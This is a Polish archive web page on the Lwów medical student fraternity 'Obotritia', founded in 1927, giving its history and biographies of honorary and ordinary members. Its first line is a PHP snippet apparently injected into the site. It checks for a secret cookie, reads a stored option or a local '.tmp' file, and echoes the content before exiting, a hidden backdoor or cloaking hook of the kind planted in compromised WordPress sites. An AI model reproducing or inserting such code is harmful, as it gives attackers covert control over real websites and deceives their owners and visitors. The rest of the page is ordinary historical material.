if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Obotritia

Dekiel Obotritii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Obotritia”
Siedziba:
Lwów
Data powstania:
17 II 1927 r.
Barwy:
szafirowa – srebrna – ciemnowiśniowa (symbolika barw: dążenie ku szczytnym ideałom – honor – przyjaźń)
Dewiza:
„Najwyższym prawem dobro Narodu”

Rys historyczny

Banda Michała Bochyńskiego.

Obotritia została złożona 17 II 1927 r. przez grupę 12 studentów Wydziału Lekarskiego Uniwersytetu Jana Kazimierza. Od momentu powstania była korporacją ściśle wydziałową i grupowała wyłącznie słuchaczy medycyny. Nazwa korporacji wywodziła się od słowiańskiego plemienia Obotrytów, które w średniowieczu zamieszkiwało tereny nad dolną Łabą i stawiało opór naporowi państwa niemieckiego na Wschód.

Herb Obotritii, 1937 r.

Od 1927 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 21 III 1927 r.). Kandydowała pod opieką K! Leopolia. Prawa członka rzeczywistego uzyskała w 1928 r. Od dnia 9 III 1932 r. istniało Koło Filistrów. W 1935 r. powstało Koło Pań Sympatyczek Obotritii.

Sobótka externa Obotritii, Lwów 30 IV 1932 r.

Kuratorem korporacji w pierwszych latach działalności był prof. Teofil Zalewski, a siedziba mieściła się przy ul. Piekarskiej 52 we Lwowie

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 129 nazwisk, w tym dziesięciu członków honorowych.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków

Obotritia ze sztandarem, Lwów.

Lista członków

Poniższa, niekompletna lista członków Obotritii obejmuje niemal 130 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Antoni Dobrzański, prawd. ok. 1937 r.

 1. Antoni Dobrzański, (20 lipca 1893 w Łazówce pow. zbaraskim - 1953) absolwent klasycznego Gimnazjum w Tarnopolu 1912, student i absolwent med. ULw., dr med. 1919, habilitacja 1929, doc. med. UJK, od 1936 ordynator Państwowego Szpitala Powszechnego we Lwowie, od 1938 prof. nadzw. UJK, w 1939 wybrany na kierownika Kliniki Otolaryngologii UW, którą objął w 1941, od 1942 wykładowca tajnego UW, kpt.-lekarz rez., Filister honorowy Obotritii (od 3 V 1932), ostatni przed wojną i pierwszy po wojnie prezes Polskiego Towarzystwa Otolaryngologicznego, pochowany na Cmentarzu Powązkowskim w Warszawie, odznaczony m.in. Krzyżem Walecznych

  Aleksander Domaszewicz, prawd. ok. 1937 r.

 2. Aleksander Domaszewicz, (26 lutego 1887 we Lwowie - 1948) absolwent Gimnazjum we Lwowie 1906, student i absolwent med. ULw. 1912, w czasie I wojny światowej lekarz w armii austriackiej i Legionach Polskich, obrońca Lwowa jako komendant szpitala na PL 1918, żołnierz WP 1918-20, od 1922 ordynator oddziału chorób nerwowych Państwowego Szpitala we Lwowie, płk rez. WP, prezes Związku Oficerów Rezerwy we Lwowie, prezes Związku Obrońców Lwowa, poseł 1930-35 i od 1935 senator RP, Filister honorowy Obotritii (od 5 grudnia 1929), po wojnie prof. neurochirurgii UW, odznaczony m.in. Krzyżem Virtuti Militari, trzykrotnie Krzyżem Walecznych, Krzyżem Obrony Lwowa z Mieczami

 3. Adam Gerstman, (1873 - 1940 we Lwowie) s. Teofila i Anastazji z d. Szwedzicka, ksiądz katolicki, jezuita, dr teologii, duszpastrz akademicki, prof. zw. ULw. 1910, kierownik Zakładu Teologii Moralnej Szczegółowej UJK, dziekan Wydziału Teologicznego 1912/13, 1914/15, 1915/16 i 1916/17 oraz 1929/30 oraz rektor UJK 1928/29 i 1932/33, Filister honorowy Lutyko-Venedyi, Gasconii oraz Obotritii (od marca 1928), w czasie okupacji sowieckiej ukrywał się we Lwowie, zmarł w skutek braku opieki lekarskiej i trudnych warunków okupacyjnych, pochowany w grobowcu rodzinnym na Cmentarzu Łyczakowskim

  Franciszek Kmietowicz, prawd. ok. 1937 r.

 4. Franciszek Kmietowicz (junior), (21 listopada 1892 w Krynicy Zdroju - 2 września 1940 we Lwowie) absolwent Gimnazjum w Nowym Sączu, student med. UJ, członek tajnych niepodległościowych organizacji gimnazjalnych i studenckich (Koło Filomatów, ZET, Drużyny Strzeleckie), obrońca Lwowa 1918 i żołnierz wojny polsko-rosyjskiej 1919-20, od 1922 pracownik naukowy Zakładu Farmakologii UJK, dr med. UJK 1920, doc. med. UJK, Filister honorowy Obotritii (od listopada 1927), zmarł we Lwowie pod okupacją sowiecką na skutek ciężkich warunków, odznaczony m.in. Krzyżem Walecznych, Krzyżem Obrony Lwowa z Mieczami, Krzyżem Niepodległości, Złotym Krzyżem Zasługi

  Włodzimierz Koskowski, prawd. ok. 1937 r.

 5. Włodzimierz Koskowski, (29 lipca 1893 w Łaszkowie w pow. tomaszewskim - 20 maja 1965 w Swindon w Wielkiej Brytanii) absolwent Gimnazjum we Lwowie, student i absolwent med. ULw., dr med. UJK 1918, obrońca Lwowa 1918, oficer-lekarz WP 1918-21, doc. 1924 i prof. farmakologii 1925-39, kierownik Zakładu Farmakologii UJK, dziekan Wydziału Lekarskiego 1932-36, Filister honorowy Obotritii (od listopada 1927), od 1939 na emigracji na Zachodzie, prof. farmakologii fizjologicznej Polskiego Wydziału Lekarskiego Uniwersytetu w Edynburgu 1941-47 (49?) i w Aleksandrii 1949-63, członek korespondent 1933 i członek czynny 1935 PAU, członek zwyczajny TNW 1946, odznaczony m.in. dwukrotnie Krzyżem Walecznych, Krzyżem Obrony Lwowa z Mieczami

  Tadeusz Marciniak, prawd. ok. 1937 r.

 6. Tadeusz Klemens Marciniak, (30 październik 1895 we Lwowie - 1966 w Warszawie) s. Józefa i Bronisławy z d. Kolasa, absolwent klasycznego V Gimnazjum we Lwowie, dr med. 1922, prof. anatomii UJK, Filister honorowy Obotritii (od 9 grudnia 1927), po wojnie prof. anatomii UWr., AM we Wrocławiu, rektor Wyższej Szkoły Wychowania Fizycznego, pochowany na Cmentarzu św. Wawrzyńca we Wrocławiu, odznaczony m.in. Krzyżem Walecznych, Krzyżem Obrony Lwowa

  Czesław Mączyński.

 7. Czesław Mączyński, (9 lipca 1881 w Kaszycach w pow. jarosławskim - 15 lipca 1935 w Kalinówce k. Narajowa) s. Pawła i Julii, absolwent klasycznego Gimnazjum w Jarosławiu 1902, student prawa UJK, student i absolwent Wydziału Filozoficznego UJK, po studiach prof. gimnazjum, kpt. rez. armii austriackiej, dowódca obrony Lwowa 1918, płk artylerii WP (brygadier), poseł na Sejm RP z ramienia Chrześcijańskiego Związku Jedności Narodowej i przewodniczący Komisji Wojskowej, Filister honorowy Gasconii i Obotritii (od 21 listopada 1933), odznaczony m.in. Krzyżem Virtuti Militari, czterokrotnie Krzyżem Walecznych, Krzyżem Obrony Lwowa, Krzyżem Niepodległości z Mieczami

  Józef Teodorowicz, prawd. ok. 1937 r.

 8. Józef Teodorowicz, (25 lipca 1864 w Żyraczowie pow. Horodenka w pow. horodeńskim - 2 grudnia 1938 we Lwowie) z rodziny szlacheckiej pochodzenia ormiańskiego, s. Grzegorza i Gertrudy z Ohanowiczów, absolwent Gimnazjum w Stanisławowie, studiował prawa na Uniwersytecie w Czerniowcach, a następnie teologię ULw., duchowny katolicki obrządku ormiańskiego, święcenia 1887, sakra biskupia 1902, arcybiskup metropolita obrządku ormiańskiego we Lwowie, członek galicyjskiego Sejmu Krajowego oraz austriackiej Rady Panów, poseł i senator RP, honorowy obywatel Brzeżan i Lwowa, doktor honoris causa UJK, Filister honorowy Obotritii (od 1932), pochowany na Cmentarzu Obrońców Lwowa, z obawy przed profanacją podczas okupacji sowieckiej zwłoki przeniesiono do grobowca rodzinnego na Cmentarzu Łyczakowskim

  Lesław Węgrzynowski, prawd. ok. 1937 r.

 9. Lesław Węgrzynowski, (16 września 1885 w Rohatynie - 10 czerwca 1956 we Wrocławiu) absolwent Gimnazjum we Lwowie 1903, student i absolwent (dr med.) ULw. 1903-10, działacz akademicki, m.in. prezes Bratniej Pomocy Studentów ULw. oraz “Ogniwa” Związku Towarzystwa Kształcącej się Młodzieży Polskiej, prymariusz Szpitala Powszechnego we Lwowie, żołnierz armii austriackiej oraz od 1918 WP, mjr-lekarz rez., Filister honorowy Obotritii (od 30 kwietnia 1932), po wojnie dyrektor Państwowego Zespołu Sanatoriów Przeciwgruźliczych w Obornikach Śląskich 1947-50, zastępca prof. UWr. 1949-51, odznaczony m.in. Krzyżem Walecznych, Krzyżem Obrony Lwowa, Krzyżem Powstańców Wielkopolskich

 10. Teofil Zalewski, (1872 w Gąbinie w pow. gostyńskim - 1953) s. Aleksandra i Wiktorii z d. Lendzion, absolwent Gimnazjum w Płocku 1890, student med. UW, za udział w manifestacji patriotycznej z okazji setnej rocznicy Powstania Kościuszkowskiego aresztowany i skazany na trzy lata zesłania, zbiegł do Krakowa, absolwent med. UJ 1896, od 1896 pracownik Kliniki Chirurgicznej ULw., habilitacja ULw. 1907, od 1917 prof. nadzw., w czasie I wojny światowej kpt.-lekarz w armii austriackiej i kierownik oddziałów otolaryngologicznych w szpitalach wojskowych w Opawie, Ołomuńcu i Lwowie, oficer-lekarz WP 1918-21, płk WP, od 1919 kierownik Katedry i Kliniki Otolaryngologii UJK, prof. zw. 1923, dziekan Wydziału Lekarskiego 1927/28, kurator i Filister honorowy Obotritii (od 1927), w 1930/31 zrzekł się tej godności jako członek sanacyjnego “zespołu stu” po sprawie uwięzienia posłów opozycji w twierdzy brzeskiej, od 1930 senator RP, prezes Związku Oficerów Rezerwy we Lwowie, podczas okupacji sowieckiej kierownik kliniki w Lwowskim Państwowym Instytucie Medycznym, a podczas okupacji niemieckiej kierownik oddziału otolaryngologii w szpitalu we Lwowie, po wojnie kierownik Katedry Otolaryngologii Wydziału Lekarskiego UWr. i PWr., odznaczony m.in. Krzyż Komandorskim Orderu Polonia Restituta 1937, dwukrotnie Złotym Krzyżem Zasługi, pochowany na Cmentarzu Rakowickim w Krakowie

Członkowie rzeczywiści

 1. Jerzy Adamczak, (21 grudnia 1916 we Lwowie - ok. 1960) absolwent Gimnazjum w Grudziądzu 1935, student i absolwent 1942 med. UJK/UL, c. 1936, akt. 1936-39, dr med. UWr. 1949, internista, radiolog, w 1956 adiunkt AM we Wrocławiu
 2. Otton Bader, (4 czerwca 1920 w Bonn - 1993), akt. 1939, student i absolwent 1944 med. UJK/ULw., dr med. Akademia Medyczna we Wrocławiu 1952, chirurg, prof. chirurgii dziecięcej AM we Wrocławiu
 3. Jerzy Mirosław Beck, (24 marca 1917 w Łodzi - 16 kwietnia 2003 w Tuszynie) s. Jana Leopolda i Marii z d. Hiller, absolwent klasycznego Gimnazjum w Łodzi 1935, od 1935 student med. UJK, akt. 1936-37, w 1939 był wolontariuszem w szpitalu w Łodzi, w 1942 w pomocy sanitarnej w 221 Pułku Piechoty, po wojnie studiował med. na Akademii Medycznej we Wrocławiu, absolwent med. UŁ 1951, lekarz Miejskiego Ośrodka Zdrowia w Tuszynie 1949-95, pochowany na Cmentarzu Rzymsko-Katolickim św. Józefa przy ul. Ogrodowej 39 w Łodzi

  Czesław Belec, prawd. ok. 1937 r.

 4. Czesław Belec, (1 maja 1905 w Borysławiu w pow. drohobyckim - 16 czerwca 1989 w Krynicy Zdrój) absolwent klasycznego Gimnazjum w Nowym Sączu 1924, student i absolwent (dr med.) 1930 Wydziału Lekarskiego UJK, założyciel Obotritii, członek Zarządu Towarzystwa Wzajemna Pomoc Medyków UJK, w wojnie obronnej 1939 ochotnik-ranny w walkach o Lwów, później w konspiracji na terenach tzw. Generalnej Guberni w AK, lekarz w szpitalach polowych, ranny, po zakończeniu wojny aresztowany przez NKWD i skazany na karę śmierci, wyrok zamieniony na powołanie do wojska, gdzie pracował w szpitalach i sanatoriach wojskowych, pracownik naukowy, zakończył służbę w randze płk. doc. med., pochowany w Korczynie k. Krosna

 5. Mieczysław Bielecki, (2 lutego 1916 w Kijowie - ) student med. UJK, akt. 1939, student i absolwent 1946 med. UJ, dr med. Uniwersytet w Szczecinie 1952, radiolog, prof. radiologii Akademii Medycznej w Gdańsku

  Wacław Bieńko, prawd. ok. 1937 r.

 6. Wacław Bieńko, (11 sierpnia 1909 w Daszawie pow. Stryj - ) absolwent klasycznego Gimnazjum w Stryju 1929, student i absolwent med. UJK 1929-37, akt. 1931-37, sekretarz 1931/32

  Józef Błaszkowski, lata 30-te.

 7. Józef Błaszkowski, (1907 w Jaryczowie Nowym w pow. lwowskim - 1971), absolwent Gimnazjum w Hrubieszowie 1929, student i absolwent med. UJK 1930-36, ppor. rez. piechoty

 8. Franciszek Bobra, (1905-1972) założyciel Obotritii, pierwszy sekretarz sem. let. 1926/27, sekretarz 1927/28, lekarz med.

  Tadeusz Bobrowski, 1936/37 r.

 9. Tadeusz Jan Ślepowron Bobrowski, (27 stycznia 1912 w Mszanie Dolnej w pow. limanowskim - ) absolwent Gimnazjum w Krośnie 1931, od 1931 student med. UJK c. 1932, akt. 1932-37, II wiceprezes 1934/35, student i absolwent Uniwersytet w Edynburgu 1942-49, po wojnie na emigracji

  Michał Bochyński, 1932 r.

 10. Michał Bochyński, (27 lipca 1905 w Krasnystawie - 1943) s. Andrzeja i Katarzyny z d. Kocińska, absolwent Gimnazjum im. Władysława Jagiełły w Krasnystawie 1927, student i absolwent med. UJK 1927-35, olderman 1929/30, prezes 1930/31 (od grudnia), prezes Wzajemnej Pomocy Medyków UJK 1932 i 1933, internista, po studiach pracował w Szpitalu Powszechnym przy ul. Piekarskiej we Lwowie 1935-36, jako zastępca dyrektora w Szpitalu w Przemyślanach 1937, jako lekarz rejonowy Ubezpieczalni Społecznej w Lubartowie 1937-38, jako lekarz domowy Ubezpieczalni Społecznej w Pruszkowie i lekarz rejonowy PKP w Pruszkowie 1938-43, pochowany na Cmentarzu w Pruszkowie

 11. Tadeusz Boszkiewicz, (17 listopada 1918 w Grzywkach - ) absolwent klasycznego Gimnazjum w Tarnopolu 1936, student med. UJK, c. 1936, akt. 1936-39, sekretarz 1938/39, student i absolwent 1945 med. UJ

  Aleksander Cabalski, prawd. ok. 1937 r.

 12. Aleksander Cabalski, ((8 stycznia 1904 w Starym Sączu - 1962) student i absolwent 1930 med. UJK, c. 1927, wiceprezes Wzajemnej Pomocy Medyków UJK 1928, po wojnie lekarz na Śląsku

  Tadeusz Ceypek, prawd. ok. 1937 r.

 13. Tadeusz Ceypek (Cejpek), (15 maja 1904 w Lwowie - ) obrońca Lwowa 1918, absolwent VIII Gimnazjum we Lwowie 1923, sutdnet i absolwent jako dr med. UJK 1923-31, założyciel Obotritii, prezes 1927/28 (od marca), po studiach asystent w Klinice Laryngologicznej UJK, habilitacja UJK 1939, od 1932 pierwszy prezes Koła Filistrów Obotritii, po wojnie prof. i kierownik Kliniki Otolaryngologii Śląskiej Akademii Medycznej w Zabrzu

 14. Eugeniusz Ciumak, akt. 1939
 15. Kazimierz Czech, (28 maja 1913 w Brzeżanach - ) absolwent klasycznego Gimnazjum w Brzeżanach 1931, od 1933 student med. UJK, c. 1936, akt. 1936-39, wiceprezes Wzajemnej Pomocy Medyków UJK 1937, ppor. rez WP, lekarz med.

  Jan Eugeniusz Czechowski, 1932 r.

 16. Jan Eugeniusz Czechowski, (17 sierpnia 1907 w Jurjanpolu pow. Borszczów - ) absolwent Gimnazjum w Kołomyi 1927, student i absolwent weterynarii AMW, I wiceprezes 1928/29, marszałek 1931/32 oraz 1932/33, delegat na XI Zjazd ZPKA, działacz akademicki m.in. prezes Akademickiego Czerwonego Krzyża oraz Sądu Honorowego AMW

 17. Czubaty, (?), akt. 1932
 18. Franciszek Czujkowski, akt. 1939

  Jan Dąbrowski, 1932 r.

 19. Jan Dąbrowski, (22 lutego 1910 w Nowym Sączu - ) absolwent humanistycznego Gimnazjum w Nowym Sączu 1929, student i absolwent med. UJK 1930-39, c. 1930/31, akt. 1930/31-37, sekretarz 1932/33, wiceprezes 1933/34 (do grudnia), olderman 1934/35, epidemiolog, po wojnie dyrektor Powiatowej Stacji Sanitarno-Epidemiologicznej w Jarosławiu

 20. Władysław Jan Deptuch, (25 kwietnia 1910 we Lwowie - ) student i absolwent 1935 med. UJK, II wiceprezes 1930/31, dr med. UMCS 1948, radiolog
 21. Andrzej Dobrzański,
 22. Zdzisław Domino, akt. 1939
 23. Stanisław Drozdowski, prezes 1933/34, skreślony 1934, lekarz med.

  Marian Józef Dubicki, prawd. ok. 1937 r.

 24. Marian Józef Dubicki, (4 sierpnia 1903 w Tłumaczu na Podolu- ) członek POW, żołnierz wojny polsko-rosyjskiej 1920, absolwent gimnazjum 1922, początkowo studiował w Warszawie i należał do Filomatii Varsoviensis, wystąpił (?), później student i absolwent 1930 med. UJK, założyciel Obotritii, sekretarz Wzajemnej Pomocy Medyków UJK 1927, ginekolog-położnik, starszy asystent Kliniki Położniczej we Lwowie, po wojnie lekarz w Krakowie

 25. Jan Dubiel, (1903 - ) brat Stanisława (Slavia), absolwent Gimnazjum 1921, student med. UJK, c. 1927

  Rudolf Duda, prawd. ok. 1937 r.

 26. Rudolf Duda, (11 stycznia 1910 w Jarosławiu - 1995) absolwent Gimnazjum w Jarosławiu 1928, student i absolwent med. UJK 1928-34, c. 1928, akt. 1931-34, II wiceprezes 1931/32, wiceprezes Wzajemnej Pomocy Medyków UJK 1931/32, ppor. rez.

 27. Stanisław Józef Dujanowicz, (11 kwietnia 1905 w Kamionce Strumiłłowej k. Tarnopola - ) student i absolwent 1934 med. UJK, założyciel Obotritii, dr med. UJK 1939, chirurg, po wojnie lekarz we Wrocławiu
 28. Zbigniew Jerzy Duma, (24 marca 1914 w Sokalu w woj. lwowskim - ) absolwent humanistycznego III Gimnazjum we Lwowie 1932/33, od 1932/33 student med. UJK, c. 1932/33, akt. 1932/33-37, działacz starszoharcerski, żołnierz AK

  Mieczysław Fludziński, 1936/37 r.

 29. Mieczysław Kazimierz Fludziński, (1 stycznia 1912 w Jarosławiu - ) absolwent Gimnazjum Klasycznego w Jarosławiu 1930/31, od 1932 student med. UJK, c. 1933, akt. 1933-37, sekretarz 1935/36 i 1936/37, po wojnie student i absolwent 1945 med. UJ, ginekolog-położnik, w 1956 lekarz w Gliwicach

 30. Stanisław Franek, akt. 1936

  Juliusz Grzędzielski, prawd. ok. 1937 r.

 31. Juliusz Grzędzielski, (8 kwietnia 1908 w Mościskach w woj. lwowskim - ) absolwent III Gimnazjum we Lwowie 1927, student i absolwent med. UJK 1927-33, c. 1927, prezes 1929/30, olderman 1931/32, ppor. rez.

 32. Jerzy Antoni Haas, (30 listopada 1917 we Lwowie - 4 kwietnia 1957) absolwent klasycznego Gimnazjum w Tarnopolu 1934/35, student i absolwent med. UJK/ULw. 1934/35-45, c. 1935, akt. 1935-39, sekretarz 1938/39, w czasie okupacji żołnierz AK, skazany, dr med. UWr. 1951, psychiatra i internista, dyrektor Sanatorium Przeciwgruźliczego w Obornikach Śląskich
 33. Tytus Jakubowski, założyciel Obotritii

  Wiktor Jankowski, prawd. ok. 1937 r.

 34. Wiktor Jankowski, (22 lutego 1905 we Lwowie - ) absolwent Gimnazjum H. Jordana we Lwowie 1924, student i absolwent jako dr med. UJK 1924-30, c. 1927, akt. 1927-30, sekretarz 1927/28, po studiach starszy asystent kliniki laryngologicznej UJK, habilitacja UJK, po wojnie prof. i kierownik Kliniki Laryngologicznej AM we Wrocławiu

 35. Kafel (?), akt. 1932

  Adam Kłosowski de Rola, 1936/37 r.

 36. Adam Andrzej Kłosowski de Rola, (30 listopada 1910 w Woli Dębowickiej w pow. Jasło - ) absolwent Gimnazjum Klasycznego oo. Jezuitów w Chyrowie 1929, student i absolwent med. 1931-36, c. 1931, akt. 1931-36, prezes 1934/35, działacz akademicki, pchor. rez., po studiach doktorant w Zakładzie Higieny UJK

 37. Kluba (Kluka?) (?), akt. 1932
 38. Kopystyński (?), akt. 1932
 39. Agenor Kormyło, akt. 1939
 40. Mieczysław Kosiński (?), sekretarz 1928 (?)
 41. Tadeusz Kościuszkiewicz, (?) (20 listopada 1918 w Równem - ) student i absolwent 1941 med. UJK/ULw., po wojnie lekarz w Lubaczowie
 42. Romuald Kowrach, akt. 1939
 43. Ferdynand Kraus, założyciel Obotritii, lekarz med.
 44. Bolesław Krawczyk, akt. 1939
 45. Ludwik Mieczysław Królikowski, (19 lipca 1914 w Szadku w pow. sieradzkim - ) absolwent humanistycznego Gimnazjum Zimowskiego w Łodzi 1934/35, student med. UJK 1934/35-39, c. 1935, akt. 1935-39, student i absolwent 1950 med. UW

  Mieczysław Krzanowski, 1936/37 r.

 46. Mieczysław Franciszek Krzanowski, (4 listopada 1914 w Jaworniku k. Rzeszowa - ) absolwent klasycznego Gimnazjum w Rzeszowie 1932/33, student med. UJK, akt. 1934-37, olderman 1934/35 (od wiosny 1935 ?), wiceprezes 1935/36, autor tekstu hymnu Obotritii

 47. Józef Kuderewicz, (5 października 1917 w Sanoku - ) absolwent klasycznego II Gimnazjum w Tarnopolu 1936, student med. UJK 1936/37-39, c. 1936, akt. 1936-39, student i absolwent med. Uniwersytet w Edynburgu 1942-49, pozostał na emigracji

  Adam Lechman.

 48. Adam Lechman, ( - 19 grudnia 1934 we Lwowie) student med. UJK, pochowany na Cmentarzu Łyczakowskim we Lwowie

  Władysław Lewiński, prawd. ok. 1937 r.

 49. Władysław Lewiński, (1898/99-1958) założyciel Obotritii, pierwszy wiceprezes sem. let. 1926/27, prezes 1927/28 (do marca), lekarz med.

  Jan Lipski, 1936/37 r.

 50. Jan Gabriel Lipski Grabie, (7 lipca 1914 w Krakowie - 12 sierpnia 1997 w Inverness na Florydzie w Stanach Zjednoczonych) h. Grabie, s. Stanisława i Ireny z d. Wyczółkowska, absolwent humanistycznego Gimnazjum w Borysławiu 1933, od 1934 student med. UJK, c. 1934, akt. 1934-38, wiceprezes 1936/37, prezes X-lecia sem. zim. 1937/38, delegat na XII Zjazd ZPKA, w wojnie obronnej 1939 w kawalerii, uciekł z niewoli rosyjskiej, uczestnik kampanii francuskiej 1940, w niewoli niemieckiej w Stalagu VIIa 1940-42, dzięki symulacji choroby wysłany do Paryża, skąd uciekł przez Morze Śródziemne do Wielkiej Brytanii, lekarz-oficer w armii brytyjskiej 1942-47, jednocześnie student i absolwent med. Uniwersytet w Edynburgu 1942-46, po wojnie na emigracji w Stanach Zjednoczonych, ukończył dodatkowe studia na Wayne State University w Detroit, praktykował jako psychiatra m.in. w Petoskey, Rogers City, Posen, Algonac, Detroit oraz w Owoso w Michigan, odznaczony dwukrotnie Krzyżem Walecznych (za kampanie 1939-40), francuskim Croix de Guerre and des combatants 1944, francuskim Medailles des prisoner de Guerre

 51. Benedykt Listewnik, akt. 1939
 52. Witold Lityński, (1913-1975) akt. 1933-34, sekretarz 1933/34 (od grudnia), lekarz med.

  Stanisław Maga, prawd. ok. 1937 r.

 53. Stanisław Marian Maga, (6 maja 1907 w Oleszycach w pow. lubaczowskim - ) absolwent humanistycznego Gimnazjum w Jaworowie 1925, student i absolwent med. UJK 1925-31 (32?), dr med. 1936, balneolog, po wojnie lekarz w Bytomiu

 54. Jan Marian Klemens Masny, (8 grudnia 1911 w Wygiełzowie w pow. oświęcimskim - ) absolwent humanistycznego Gimnazjum w Chrzanowie 1930/31, student i absolwent med. UJK 1931/32-38, c. 1931/32, akt. 1931/32-37, internista, po wojnie lekarz w Katowicach
 55. Tadeusz Roman Mendelewski, (7 czerwca 1919 w Nowym Sączu - ) student medycyny UJK, akt. 1939, student i absolwent 1949 med. UJ
 56. Władysław Morawski, (24 września 1913 w Łodzi - ) student med. UJK, akt. 1939, student i absolwent 1948 med. UŁ, dr med. UŁ 1950, internista, po wojnie lekarz w Radomsku
 57. Antoni Motyka, (21 stycznia 1909 [08?] w Mostach na Śląsku Cieszyńskim - po 1956 w Katowicach) absolwent Gimnazjum Matematyczno-Przyrodniczego w Cieszynie 1928, student med. UJK 1928/29-37, akt. 1934-37, lekarz med., ginekolog-położnik, po wojnie lekarz w Katowicach
 58. Zbigniew Muszyński, c. 1927, akt. 1927-28, olderman 1927/28 (do marca)
 59. Stanisław Olchawa, (?)
 60. Oleśnik (?), akt. 1932
 61. Stanisław Opiela, akt. 1939
 62. Eugeniusz Orchel, (12 listopada 1913 w Tymbarku - ) absolwent klasycznego Gimnazjum w Jaśle 1932, student prawa i med. UJK 1933/34-39, c. 1937, akt. 1937-39, student i absolwent Uniwersytetu w Edynburgu 1942-49

  Tadeusz Osiecki, prawd. ok. 1937 r.

 63. Tadeusz Osiecki, założyciel Obotritii, pierwszy prezes sem. let. 1926/27, olderman 1927/28 (od marca) oraz 1928/29

  Karol Ossadnik, 1936/37 r.

 64. Karol Ossadnik (Karol Maria Ossadnik-Stary Koń), (20 lipca 1914 w Birczy k. Przemyśla - ok. 1970 w Przeworsku) absolwent klasycznego Gimnazjum w Rzeszowie 1932/33, student i absolwent med. UJK 1932/33-3?, c. 1933, akt. 1933-37, sekretarz 1934/35 (od listopada/grudnia ?), olderman 1935/36, wiceprezes 1936/37, delegat na XII Zjazd ZPKA, internista, po wojnie lekarz w Przeworsku

 65. Tadeusz Ostrowski, (26 stycznia 1917 w Borysławiu k. Drohobycza - ) absolwent humanistycznego Gimnazjum w Borysławiu 1935/36, student med. UJK 1935/36-39, c. 1936, akt. 1936-39, student i absolwent med. Uniwersytet w Edynburgu 1942-49

  Bernard Perek.

 66. Bernard Stanisław Perek, (17 czerwca 1904 w Lesznie - 1984 we Wrocławiu) absolwent Gimnazjum w Lesznie 1923, student med. UP, UJK i UJ, c. 1927 Obotritia [założyciel Obotritii ?], akt. 1927-28, od 1928 Filister Obotritii, c. 1938 Vesalia, akt. 1938-39, absolwent med. UJK 1939, działacz akademicki m.in. dwukrotny wiceprezes Koła Studentów z Kresów Zachodnich, prezes Koła Studentów w Lesznie, okulista, po wojnie we Wrocławiu

 67. Marian Piec, (9 lipca 1911 w Dzierzkowicach w woj. lubelskim - ) absolwent humanistycznego Gimnazjum w Krośniku Lubelskim 1927 (?), student med. UJK, c. 1936, akt. 1936-37, ppor. rez. artylerii
 68. Jerzy Piotrowicz, (29 maja 1916 we Lwowie - ) absolwent Gimnazjum w Drohobyczu 1936, student med. UJK 1936-39, c. 1936, akt. 1936-39
 69. Kazimierz Piotrowski, akt. 1939
 70. Franciszek Płoszaj, (10 lipca 1911 w Wiązownicy w pow. jarosławskim - ) absolwent klasycznego Gimnazjum w Jarosławiu 1931, student i absolwent med. UJK 1931-36?, c. 1931, akt. 1931-37
 71. Jerzy Rafiński, (?)
 72. Zbigniew Rafiński, student weterynarii AMW, akt. 1936-39
 73. Rasiewicz (?), akt. 1932

  Czesław Rojek, 1936/37 r.

 74. Czesław Rojek, c. 1931, sekretarz 1934/35 (do listopada/grudnia), skreślony 1936, wiceprezes 1936, a następnie prezes 1937 i 1938 Czytelni Akademickiej, wiceprezes Wzajemnej Pomocy Medyków UJK 1936, po wojnie na Kujawach

 75. Wiktor Rolbiczek, autor pieśni fuksowskiej
 76. Rufka (?), akt. 1932
 77. Marek Ruszkowski, c. 1936, akt. 1936-39
 78. Ryziński (?), akt. 1932
 79. Janusz Samaryk, akt. 1939

  Stanisław Samosiej-Sanecki, prawd. ok. 1937 r.

 80. Stanisław Jan Samosiej-Sanecki, (19 maja 1904 we Lwowie - ) student i absolwent 1931 med. UJK, założyciel Obotritii, prezes 1928/29, ginekolog-położnik, internista, po wojnie lekarz w Bytomiu

 81. Tadeusz Schindler, założyciel Obotritii
 82. Jan Siekanowicz, wiceprezes Młodzieży Wszechpolskiej 1934/35, skreślony 1936
 83. Teodor Słomiński, (8 listopada 1917 w Wiązówce - ) student med. UJK, akt. 1939, student i absolwent 1948 med. UP, dr med. 1950, laryngolog, internista, po wojnie lekarz w sanatorium w Dziekanowie Leśnym
 84. Zygmunt Skibiński, (8 stycznia 1915 w Grębinie - ) absolwent neoklasycznego Gimnazjum w Grudziądzu 1936, student med. UJK 1937, c. 1937

  Bogdan Skowron, druga poł. lat 30-tych.

 85. Bogdan Skowron, (20 lutego 1914 w Sulmierzycach pow. Radomsko - marzec 1944 w Hołobach k. Kowla na Ukrainie) s. Władysława i Heleny z d. Dębowska, absolwent humanistycznego Gimnazjum im. Juliusza Słowackiego w Kowlu 1934, student i absolwent med. UJK/Uniwersytetu we Lwowie 1934-41, c. 1936, akt. 1936-37, zmobilizowany w wojnie obronnej 1939 do artylerii we Włodzimierzu Wołyńskim, po studiach pracował jako lekarz w Turzysku k. Kowla, a następnie jako chirurg w szpitalu w Kowlu, lekarz AK, w tym oddziałów partyzanckich, współpracownik I Inspektoratu Okręgowej Delegatury Rządu w Kowlu, aresztowany w lutym 1944, a następnie zwolniony, później lekarz w 27 Wołyńskiej Dywizji Piechoty AK, uczestnik Akcji Burza, zginął, pochowany na cmentarzu w Zasmykach na Ukrainie, jego nazwisko znajduje się na płycie kowelskiej na Skwerze Wołyńskim w Warszawie

 86. Tadeusz Skórecki, (?)

  Lucjan Sobociński, ok. 1930 r. (?)

 87. Lucjan Sobociński, ( - 20 grudnia 1935) II wiceprezes 1928/29, wiceprezes i p.o. prezesa 1929/30, prezes 1930/31 (do grudnia)

